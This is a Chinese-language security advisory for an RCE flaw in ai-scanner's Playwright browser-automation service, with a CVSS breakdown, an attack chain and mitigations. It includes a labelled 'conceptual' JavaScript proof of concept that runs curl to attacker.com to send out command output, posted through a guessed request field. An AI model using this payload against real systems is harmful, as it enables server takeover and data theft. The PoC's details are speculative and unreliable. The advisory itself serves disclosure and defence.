CVE-2026-41512 ai-scanner 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-41512

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ai-scanner

漏洞概述

ai-scanner是一个基于NVIDIA garak构建的AI模型安全扫描器。在1.0.0至1.4.1之前的版本中，BrowserAutomation::PlaywrightService组件存在严重的远程代码执行漏洞。该漏洞源于JavaScript注入，攻击者可以通过构造恶意输入，在目标系统上执行任意JavaScript代码。由于CVSS评分高达9.9，且无需用户交互即可利用，该漏洞对系统机密性、完整性和可用性构成极高威胁。建议受影响用户尽快升级至安全版本以修复此问题。

技术细节

该漏洞根因位于BrowserAutomation::PlaywrightService模块中，该模块负责自动化浏览器操作以扫描AI模型。在处理特定输入时，程序未能严格过滤或转义用户提供的JavaScript代码，导致注入攻击。攻击者利用低权限账户通过网络向该服务发送特制的JavaScript Payload。由于Playwright允许执行脚本以驱动浏览器，恶意代码被直接传递到底层浏览器引擎执行。这突破了应用程序沙箱限制，允许攻击者在运行ai-scanner的服务器上获得远程代码执行权限。攻击者可借此读取敏感文件、安装后门或横向移动。CVSS向量显示攻击复杂度低且范围可变，意味着漏洞利用门槛较低且影响范围可能超出组件本身。

攻击链分析

STEP 1

侦察

攻击者识别出目标网络中运行着存在漏洞的ai-scanner版本（1.0.0至1.4.1之前）。

STEP 2

利用

攻击者利用低权限账户，通过网络向BrowserAutomation::PlaywrightService接口发送包含恶意JavaScript代码的请求数据包。

STEP 3

执行

由于输入验证缺失，Playwright服务直接解析并执行注入的恶意JavaScript代码，从而在服务器端触发命令执行。

STEP 4

维持与影响

攻击者获得服务器控制权，可进一步窃取数据、破坏系统完整性或部署持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for CVE-2026-41512
// Exploiting JavaScript injection in BrowserAutomation::PlaywrightService

const maliciousPayload = `
    const require = global.require || global.process.mainModule.require;
    const child_process = require('child_process');
    child_process.exec('curl http://attacker.com/exfil?data=$(whoami)');
`;

// Simulating the vulnerable endpoint call
fetch('http://target-ai-scanner/api/scan', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
        // The specific field triggering Playwright script execution
        browser_script: maliciousPayload
    })
});

影响范围

ai-scanner >= 1.0.0, < 1.4.1

防御指南

临时缓解措施

若无法立即升级，建议暂时禁用BrowserAutomation功能模块，或通过网络ACL限制对服务端口的访问，仅允许受信任的内部IP调用相关接口。